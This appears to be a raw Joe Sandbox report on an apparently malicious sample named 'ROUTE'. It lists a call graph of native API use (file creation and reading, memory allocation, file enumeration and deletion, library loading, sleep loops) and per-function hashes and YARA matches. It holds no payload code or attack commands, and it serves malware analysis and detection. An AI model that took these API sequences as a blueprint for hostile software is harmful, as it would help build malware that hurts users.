99025->99026 99028 aa3250 99026->99028 99029 ab9f10 99026->99029 99028->99020 99030 ab9f2a 99029->99030 99031 ab54c0 2 API calls 99030->99031 99033 ab9f50 99031->99033 99032 ab9f59 99032->99028 99033->99032 99034 ab8b20 LdrInitializeThunk 99033->99034 99035 ab9fb6 99034->99035 99036 abb570 RtlFreeHeap 99035->99036 99037 ab9fcc 99036->99037 99037->99028 99039 aa1a38 99038->99039 99060 aa7e90 99039->99060 99041 aa1a40 99042 aa1d13 99041->99042 99043 abb650 RtlAllocateHeap 99041->99043 99042->99024 99044 aa1a56 99043->99044 99045 abb650 RtlAllocateHeap 99044->99045 99046 aa1a67 99045->99046 99047 abb650 RtlAllocateHeap 99046->99047 99048 aa1a78 99047->99048 99071 aa5f40 99048->99071 99050 aa1a85 99051 ab54c0 2 API calls 99050->99051 99054 aa1abf 99050->99054 99052 aa1aaa 99051->99052 99053 ab54c0 2 API calls 99052->99053 99053->99054 99059 aa1b06 99054->99059 99081 aa6a20 NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 99054->99081 99056 aa4570 2 API calls 99057 aa1cc2 99056->99057 99077 ab7f60 99057->99077 99059->99056 99061 aa7ebc 99060->99061 99082 aa7d80 99061->99082 99064 aa7ee9 99067 ab94d0 NtClose 99064->99067 99069 aa7ef4 99064->99069 99065 aa7f01 99066 aa7f1d 99065->99066 99068 ab94d0 NtClose 99065->99068 99066->99041 99067->99069 99070 aa7f13 99068->99070 99069->99041 99070->99041 99072 aa5f53 99071->99072 99074 aa5f5d 99071->99074 99072->99050 99073 aa6043 99073->99050 99074->99073 99075 ab54c0 2 API calls 99074->99075 99076 aa60c9 99075->99076 99076->99050 99078 ab7fc1 99077->99078 99080 ab7fce 99078->99080 99093 aa1d30 99078->99093 99080->99042 99081->99059 99083 aa7d9a 99082->99083 99087 aa7e76 99082->99087 99088 ab8bc0 99083->99088 99086 ab94d0 NtClose 99086->99087 99087->99064 99087->99065 99089 ab8bdd 99088->99089 99092 33035c0 LdrInitializeThunk 99089->99092 99090 aa7e6a 99090->99086 99092->99090 99109 aa8160 99093->99109 99095 aa2294 99095->99080 99096 aa1d50 99096->99095 99113 ab1170 99096->99113 99099 aa1f64 99101 abc740 2 API calls 99099->99101 99100 aa1dab 99100->99095 99116 abc610 99100->99116 99103 aa1f79 99101->99103 99102 aa8100 LdrInitializeThunk 99105 aa1fc6 99102->99105 99103->99105 99121 aa0860 99103->99121 99105->99095 99105->99102 99106 aa0860 LdrInitializeThunk 99105->99106 99106->99105 99107 aa2117 99107->99105 99108 aa8100 LdrInitializeThunk 99107->99108 99108->99107 99110 aa816d 99109->99110 99111 aa818e SetErrorMode 99110->99111 99112 aa8195 99110->99112 99111->99112 99112->99096 99114 abb4f0 NtAllocateVirtualMemory 99113->99114 99115 ab1191 99114->99115 99115->99100 99117 abc620 99116->99117 99118 abc626 99116->99118 99117->99099 99119 abb650 RtlAllocateHeap 99118->99119 99120 abc64c 99119->99120 99120->99099 99124 ab9760 99121->99124 99125 ab977d 99124->99125 99128 3302c70 LdrInitializeThunk 99125->99128 99126 aa087f 99126->99107 99128->99126 99129 aa3113 99130 aa7d80 2 API calls 99129->99130 99131 aa3123 99130->99131 99132 ab94d0 NtClose 99131->99132 99133 aa313f 99131->99133 99132->99133 99134 aa6d90 99135 aa6dba 99134->99135 99138 aa7f30 99135->99138 99137 aa6de1 99139 aa7f4d 99138->99139 99145 ab8c10 99139->99145 99141 aa7f9d 99142 aa7fa4 99141->99142 99143 ab8cf0 LdrInitializeThunk 99141->99143 99142->99137 99144 aa7fcd 99143->99144 99144->99137 99146 ab8cab 99145->99146 99148 ab8c3e 99145->99148 99150 3302f30 LdrInitializeThunk 99146->99150 99147 ab8ce4 99147->99141 99148->99141 99150->99147 99151 aa7310 99152 aa7328 99151->99152 99156 aa7382 99151->99156 99152->99156 99157 aaafd0 99152->99157 99154 aa736c 99155 aab290 9 API calls 99154->99155 99154->99156 99155->99156 99158 aaaff5 99157->99158 99159 ab54c0 2 API calls 99158->99159 99161 aab17c 99159->99161 99160 aab24b 99160->99154 99161->99160 99162 ab54c0 2 API calls 99161->99162 99162->99160 99163 aaad50 99168 aaaa60 99163->99168 99165 aaad5d 99183 aaa6d0 99165->99183 99167 aaad79 99169 aaaa85 99168->99169 99195 aa8370 99169->99195 99172 aaabd0 99172->99165 99174 aaabe7 99174->99165 99176 aaabde 99176->99174 99178 aaacd5 99176->99178 99219 ab3210 99176->99219 99223 aaa120 99176->99223 99180 aaad3a 99178->99180 99234 aaa490 99178->99234 99181 abb570 RtlFreeHeap 99180->99181 99182 aaad41 99181->99182 99182->99165 99184 aaa6e6 99183->99184 99193 aaa6f1 99183->99193 99185 abb650 RtlAllocateHeap 99184->99185 99185->99193 99186 aaa718 99186->99167 99187 aa8370 GetFileAttributesW 99187->99193 99188 aaaa32 99189 aaaa4b 99188->99189 99190 abb570 RtlFreeHeap 99188->99190 99189->99167 99190->99189 99191 ab3210 2 API calls 99191->99193 99192 aaa120 3 API calls 99192->99193 99193->99186 99193->99187 99193->99188 99193->99191 99193->99192 99194 aaa490 3 API calls 99193->99194 99194->99193 99196 aa8391 99195->99196 99197 aa8398 GetFileAttributesW 99196->99197 99198 aa83a3 99196->99198 99197->99198 99198->99172 99199 ab3380 99198->99199 99200 ab338e 99199->99200 99201 ab3395 99199->99201 99200->99176 99202 aa4570 2 API calls 99201->99202 99203 ab33ca 99202->99203 99204 ab33d9 99203->99204 99240 ab2e40 LdrLoadDll LdrLoadDll 99203->99240 99206 abb650 RtlAllocateHeap 99204->99206 99216 ab35a2 99204->99216 99207 ab33f2 99206->99207 99208 ab340e 99207->99208 99209 ab357d 99207->99209 99207->99216 99241 ab7420 NtClose RtlAllocateHeap 99208->99241 99211 ab362b 99209->99211 99212 ab3587 99209->99212 99214 abb570 RtlFreeHeap 99211->99214 99242 ab7420 NtClose RtlAllocateHeap 99212->99242 99213 ab3429 99213->99216 99217 abb570 RtlFreeHeap 99213->99217 99214->99216 99216->99176 99218 ab3571 99217->99218 99218->99176 99220 ab3226 99219->99220 99222 ab3331 99219->99222 99221 ab54c0 2 API calls 99220->99221 99220->99222 99221->99220 99222->99176 99224 aaa146 99223->99224 99225 ab54c0 2 API calls 99224->99225 99226 aaa1ad 99225->99226 99243 aadb70 99226->99243 99228 aaa1b8 99230 aaa340 99228->99230 99231 aaa1d6 99228->99231 99229 aaa325 99229->99176 99230->99229 99232 aa9fe0 RtlFreeHeap 99230->99232 99231->99229 99254 aa9fe0 99231->99254 99232->99230 99235 aaa4b6 99234->99235 99236 ab54c0 2 API calls 99235->99236 99237 aaa532 99236->99237 99238 aadb70 3 API calls 99237->99238 99239 aaa53d 99238->99239 99239->99178 99240->99204 99241->99213 99242->99216 99244 aadb7b 99243->99244 99245 ab54c0 2 API calls 99244->99245 99246 aadb94 99245->99246 99247 aadba1 99246->99247 99248 ab54c0 2 API calls 99246->99248 99247->99228 99249 aadbb8 99248->99249 99249->99247 99250 ab54c0 2 API calls 99249->99250 99251 aadbd7 99250->99251 99252 abb570 RtlFreeHeap 99251->99252 99253 aadbe4 99252->99253 99253->99228 99255 aa9ffd 99254->99255 99258 aadc00 99255->99258 99257 aaa103 99257->99231 99259 aadc24 99258->99259 99260 aadcce 99259->99260 99261 abb570 RtlFreeHeap 99259->99261 99260->99257 99261->99260 99262 ab6090 99264 ab60ea 99262->99264 99263 ab60f7 99264->99263 99266 ab3aa0 99264->99266 99267 abb4f0 NtAllocateVirtualMemory 99266->99267 99268 ab3ae1 99267->99268 99269 ab3bee 99268->99269 99270 aa4570 2 API calls 99268->99270 99269->99263 99272 ab3b27 99270->99272 99271 ab3b70 Sleep 99271->99272 99272->99269 99272->99271 99273 ab8ad0 99274 ab8aed 99273->99274 99277 3302df0 LdrInitializeThunk 99274->99277 99275 ab8b15 99277->99275 99278 ab91d0 99279 ab91ff 99278->99279 99280 ab9284 99278->99280 99281 ab929a NtCreateFile 99280->99281 99282 ab8950 99283 ab89df 99282->99283 99285 ab897e 99282->99285 99287 3302ee0 LdrInitializeThunk 99283->99287 99284 ab8a10 99287->99284

                                                                                                                            Executed Functions

                                                                                                                            Function 00A99E10 Relevance: 12.8, Strings: 10, Instructions: 264COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 273 a99e10-a99fc4 274 a99fce-a99fd7 273->274 275 a99fd9-a99ff1 274->275 276 a99ff3-a99ffa 274->276 275->274 277 a9a001-a9a008 276->277 278 a9a00a-a9a020 277->278 279 a9a02d-a9a03b 277->279 280 a9a02b 278->280 281 a9a022-a9a028 278->281 282 a9a046-a9a04f 279->282 280->277 281->280 283 a9a051-a9a061 282->283 284 a9a063-a9a06a 282->284 283->282 285 a9a075-a9a07b 284->285 287 a9a08b-a9a092 285->287 288 a9a07d-a9a089 285->288 289 a9a095-a9a09e 287->289 288->285 291 a9a193-a9a19d 289->291 292 a9a0a4-a9a0bc 289->292 293 a9a19f-a9a1be 291->293 294 a9a1d1-a9a1d8 291->294 295 a9a0eb-a9a0f4 292->295 296 a9a0be-a9a0c5 292->296 297 a9a1cf 293->297 298 a9a1c0-a9a1c9 293->298 300 a9a1da-a9a1e1 294->300 301 a9a23c-a9a248 294->301 302 a9a113-a9a11a 295->302 303 a9a0f6-a9a111 295->303 299 a9a0d0-a9a0d9 296->299 297->291 298->297 304 a9a0db-a9a0e4 299->304 305 a9a0e6 299->305 306 a9a1e3-a9a210 300->306 307 a9a212 call abb1e0 300->307 310 a9a24a-a9a265 301->310 311 a9a267-a9a270 301->311 308 a9a13b-a9a141 302->308 309 a9a11c-a9a139 302->309 303->295 304->299 305->291 306->300 317 a9a217-a9a21e 307->317 314 a9a145-a9a149 308->314 309->302 310->301 315 a9a28f-a9a299 311->315 316 a9a272-a9a28d 311->316 318 a9a14b-a9a170 314->318 319 a9a172-a9a178 314->319 316->311 320 a9a229-a9a22f 317->320 318->314 321 a9a17a-a9a18c 319->321 322 a9a18e 319->322 320->301 323 a9a231-a9a23a 320->323 321->319 322->289 323->320
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.3539706427.0000000000A90000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A90000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_a90000_ROUTE.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: $&y$(J)$?U$L$VpX5$X5$l'$~p$)
                                                                                                                            • API String ID: 0-3944832665
                                                                                                                            • Opcode ID: 939e06caa41427aa9c884967f0a47be81d0530141a5c3b61c2e427d59a76ca6f
                                                                                                                            • Instruction ID: d5844c989e21f6e492c42d4bbc246f42bbcce95e4848586bf39d7310e48a8d94
                                                                                                                            • Opcode Fuzzy Hash: 939e06caa41427aa9c884967f0a47be81d0530141a5c3b61c2e427d59a76ca6f
                                                                                                                            • Instruction Fuzzy Hash: 85D1D1B0E05218CFEF24CF99C994B9DBBF2BF54308F20819AC0196B285D7755A89CF95
                                                                                                                            Function 00AAC600 Relevance: 4.6, APIs: 3, Instructions: 106fileCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • FindFirstFileW.KERNELBASE(?,00000000), ref: 00AAC6E4
                                                                                                                            • FindNextFileW.KERNELBASE(?,00000010), ref: 00AAC71F
                                                                                                                            • FindClose.KERNELBASE(?), ref: 00AAC72A
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.3539706427.0000000000A90000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A90000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_a90000_ROUTE.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Find$File$CloseFirstNext
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3541575487-0
                                                                                                                            • Opcode ID: 0bcd0ed3e76a3e13bba6a3f69d416f9609b832d3224101b31c1df1672a9431be
                                                                                                                            • Instruction ID: 8d8fb73d400d2cdad22790095b6de4b4e54051573f074eb1953410778696b39e
                                                                                                                            • Opcode Fuzzy Hash: 0bcd0ed3e76a3e13bba6a3f69d416f9609b832d3224101b31c1df1672a9431be
                                                                                                                            • Instruction Fuzzy Hash: E53183B19003097BEB20DF60CD85FFB77BC9B95754F104558B908A7181EBB0AE94CBA0
                                                                                                                            Function 00AB91D0 Relevance: 1.6, APIs: 1, Instructions: 101filenativeCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • NtCreateFile.NTDLL(?,?,?,?,635CE8B4,?,?,?,?,?,?), ref: 00AB92CB
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.3539706427.0000000000A90000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A90000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_a90000_ROUTE.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateFile
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 823142352-0
                                                                                                                            • Opcode ID: 041070744bf495d413e60ee7f098dc23643cf720cfc8c4fd3fcc99ce66d5656b
                                                                                                                            • Instruction ID: ff23336a54efd1d2cef0bbb7ee1f17ac56110ba8bff7cc7f40171cb9ee3dbaae
                                                                                                                            • Opcode Fuzzy Hash: 041070744bf495d413e60ee7f098dc23643cf720cfc8c4fd3fcc99ce66d5656b
                                                                                                                            • Instruction Fuzzy Hash: 5D31C4B5A01248AFDB14DF99D881EEEB7F9EF8C710F108609F918A7241D670A851CFA5
                                                                                                                            Function 00AB9340 Relevance: 1.6, APIs: 1, Instructions: 93filenativeCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • NtReadFile.NTDLL(?,?,?,?,635CE8B4,?,?,?,?), ref: 00AB9426
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.3539706427.0000000000A90000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A90000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_a90000_ROUTE.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: FileRead
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2738559852-0
                                                                                                                            • Opcode ID: 19e5f510a2379a7b0105218b5c10e5d434f5aa5545959674cace4c4f58d775f2
                                                                                                                            • Instruction ID: ae77a8febf03430e44d75f4d44f87b57ff0bb1ca3ddbdc44a575e86a6417126f
                                                                                                                            • Opcode Fuzzy Hash: 19e5f510a2379a7b0105218b5c10e5d434f5aa5545959674cace4c4f58d775f2
                                                                                                                            • Instruction Fuzzy Hash: C631D6B5A00208AFDB14DF99D841EEFB7F9EF8C714F108509F918A7241D674A811CFA5
                                                                                                                            Function 00AB9640 Relevance: 1.6, APIs: 1, Instructions: 81memorynativeCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • NtAllocateVirtualMemory.NTDLL(00AA1DAB,?,00AB7FCE,00000000,635CE8B4,00003000,?,?,?,?,?,00AB7FCE,00AA1DAB), ref: 00AB9708
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.3539706427.0000000000A90000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A90000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_a90000_ROUTE.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: AllocateMemoryVirtual
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2167126740-0
                                                                                                                            • Opcode ID: 291b8b0d8513af749782a9f3aaa48f50bade7b93b4a3b8851dfe6bbb34d5246b
                                                                                                                            • Instruction ID: 7e377c29b3f440e52606ced81725bd01a0f995bb843eda673913216659d3ceea
                                                                                                                            • Opcode Fuzzy Hash: 291b8b0d8513af749782a9f3aaa48f50bade7b93b4a3b8851dfe6bbb34d5246b
                                                                                                                            • Instruction Fuzzy Hash: B0211EB5A00249AFDB10DFA8DC42EEFB7BDEF88710F108509F918A7241D674A911CFA1
                                                                                                                            Function 00AB9430 Relevance: 1.6, APIs: 1, Instructions: 61filenativeCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.3539706427.0000000000A90000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A90000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_a90000_ROUTE.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: DeleteFile
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4033686569-0
                                                                                                                            • Opcode ID: 149bccc46e621c08124e4ae7e9c00c89c746301c5cbaa3a94d4c773a8c74d55c
                                                                                                                            • Instruction ID: 0912c14f37ff49ef27da12a48707aee266d78859f0ed7708a98abeb230c5c6f6
                                                                                                                            • Opcode Fuzzy Hash: 149bccc46e621c08124e4ae7e9c00c89c746301c5cbaa3a94d4c773a8c74d55c
                                                                                                                            • Instruction Fuzzy Hash: 5311A371A00644BED620EB68DC02FEF77ACDF88710F108509FA18A7182E7717501CBA5
                                                                                                                            Function 00AB94D0 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • NtClose.NTDLL(00AB1801,?,-665E6599,?,?,00AB1801,?,00009D57), ref: 00AB9507
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.3539706427.0000000000A90000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A90000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_a90000_ROUTE.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Close
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3535843008-0
                                                                                                                            • Opcode ID: 9b38cc4083fcf95519bbd2f222b190f3b983931ae5abd193463e60ae3ae6f940
                                                                                                                            • Instruction ID: 1e6e0b3a80aef60008d84bc62a140c91a3e14832c5436c052e381371cb00454e
                                                                                                                            • Opcode Fuzzy Hash: 9b38cc4083fcf95519bbd2f222b190f3b983931ae5abd193463e60ae3ae6f940
                                                                                                                            • Instruction Fuzzy Hash: C1E08C766002147BD620EA69DC41FDBB7ACDFC9720F518455FA0CA7242D672B9128BF0
                                                                                                                            Function 03304340 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.3541311070.0000000003290000.00000040.00001000.00020000.00000000.sdmp, Offset: 03290000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.3541311070.00000000033B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.3541311070.00000000033BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.3541311070.000000000342E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_3290000_ROUTE.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: InitializeThunk
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2994545307-0
                                                                                                                            • Opcode ID: 17d243e892a797c5f3dfa31b98d94dccb399d321638812bd83d70252b1c1bbc0
                                                                                                                            • Instruction ID: 879daf37759a9bc350f1aa4dc6358117329402a507942998154e0814d677bdf6
                                                                                                                            • Opcode Fuzzy Hash: 17d243e892a797c5f3dfa31b98d94dccb399d321638812bd83d70252b1c1bbc0
                                                                                                                            • Instruction Fuzzy Hash: C8900235655804139144B15C48C4546500597E1301B55C011E0424954CCB148A665365
                                                                                                                            Function 03304650 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.3541311070.0000000003290000.00000040.00001000.00020000.00000000.sdmp, Offset: 03290000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.3541311070.00000000033B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.3541311070.00000000033BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.3541311070.000000000342E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_3290000_ROUTE.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: InitializeThunk
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2994545307-0
                                                                                                                            • Opcode ID: 20ff3ea6d94fc3b2953b70e295bbc546a6bfacd1a92a525ac47910fa010f43ac
                                                                                                                            • Instruction ID: 512d84c4b463ba19d1d08a4ec106bdcc7a1686b4ec3716526cf817b423cd80d7
                                                                                                                            • Opcode Fuzzy Hash: 20ff3ea6d94fc3b2953b70e295bbc546a6bfacd1a92a525ac47910fa010f43ac
                                                                                                                            • Instruction Fuzzy Hash: A8900265651504434144B15C4844406700597E2301395C115A0554960CC7188965926D
                                                                                                                            Function 03302B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.3541311070.0000000003290000.00000040.00001000.00020000.00000000.sdmp, Offset: 03290000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.3541311070.00000000033B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.3541311070.00000000033BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.3541311070.000000000342E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_3290000_ROUTE.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: InitializeThunk
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2994545307-0
                                                                                                                            • Opcode ID: 6f6823d668a495c1b070a329e7073bffeecfd91924da1724b9877caaa562b849
                                                                                                                            • Instruction ID: c0655e5ae010b81fe6da071466ca66cd4cef47aec7b65d6de6396af339aa83ab
                                                                                                                            • Opcode Fuzzy Hash: 6f6823d668a495c1b070a329e7073bffeecfd91924da1724b9877caaa562b849
                                                                                                                            • Instruction Fuzzy Hash: D2900265252404034109B15C4454616500A87E1201B55C021E1014990DC72589A16129
                                                                                                                            Function 03302BA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.3541311070.0000000003290000.00000040.00001000.00020000.00000000.sdmp, Offset: 03290000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.3541311070.00000000033B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.3541311070.00000000033BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.3541311070.000000000342E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_3290000_ROUTE.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: InitializeThunk
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2994545307-0
                                                                                                                            • Opcode ID: 4cd15ff33d51b55f87ddb51f3f1745c58d8f66a1bd04751a364103d9b61d12f0
                                                                                                                            • Instruction ID: b6f695ea9c24011e793192b906089b58495d435d5985048bc05cd643efcdb8ee
                                                                                                                            • Opcode Fuzzy Hash: 4cd15ff33d51b55f87ddb51f3f1745c58d8f66a1bd04751a364103d9b61d12f0
                                                                                                                            • Instruction Fuzzy Hash: 9990023565540C03D154B15C4454746100587D1301F55C011A0024A54DC7558B6576A5
                                                                                                                            Function 03302BF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.3541311070.0000000003290000.00000040.00001000.00020000.00000000.sdmp, Offset: 03290000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.3541311070.00000000033B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.3541311070.00000000033BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.3541311070.000000000342E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_3290000_ROUTE.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: InitializeThunk
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2994545307-0
                                                                                                                            • Opcode ID: 3566ae7d27a7813ef9619b2388feab57f5e250827791fce9db37ceba8620c362
                                                                                                                            • Instruction ID: 2720cdabd28980a5e12d76943e267ccb00fdd7ecfe8d3b2579bce2654a1017aa
                                                                                                                            • Opcode Fuzzy Hash: 3566ae7d27a7813ef9619b2388feab57f5e250827791fce9db37ceba8620c362
                                                                                                                            • Instruction Fuzzy Hash: 8490023525140C03D184B15C444464A100587D2301F95C015A0025A54DCB158B6977A5
                                                                                                                            Function 03302BE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.3541311070.0000000003290000.00000040.00001000.00020000.00000000.sdmp, Offset: 03290000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.3541311070.00000000033B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.3541311070.00000000033BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.3541311070.000000000342E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_3290000_ROUTE.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: InitializeThunk
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2994545307-0
                                                                                                                            • Opcode ID: 9ddb74ae0f71b2c7c915246226240947d92a3eeeca517fd5f472584bcf5ea888
                                                                                                                            • Instruction ID: ca47b52876f54f5460513cb9bf20aa6e42f07d631836f0821589242c75d404c7
                                                                                                                            • Opcode Fuzzy Hash: 9ddb74ae0f71b2c7c915246226240947d92a3eeeca517fd5f472584bcf5ea888
                                                                                                                            • Instruction Fuzzy Hash: FD90023525544C43D144B15C4444A46101587D1305F55C011A0064A94DD7258E65B665
                                                                                                                            Function 03302AF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.3541311070.0000000003290000.00000040.00001000.00020000.00000000.sdmp, Offset: 03290000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.3541311070.00000000033B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.3541311070.00000000033BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.3541311070.000000000342E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_3290000_ROUTE.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: InitializeThunk
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2994545307-0
                                                                                                                            • Opcode ID: 8ad6877beac453d9ab426cdfeddb5f994911afae7c24e3328f4196c538f527d5
                                                                                                                            • Instruction ID: 8e94fcfbabbd82a1516aed08be5ab4782b57ec6678cae163631485d45592fa72
                                                                                                                            • Opcode Fuzzy Hash: 8ad6877beac453d9ab426cdfeddb5f994911afae7c24e3328f4196c538f527d5
                                                                                                                            • Instruction Fuzzy Hash: D1900229271404030149F55C064450B144597D7351395C015F1416990CC72189755325
                                                                                                                            Function 03302AD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.3541311070.0000000003290000.00000040.00001000.00020000.00000000.sdmp, Offset: 03290000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.3541311070.00000000033B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.3541311070.00000000033BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.3541311070.000000000342E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
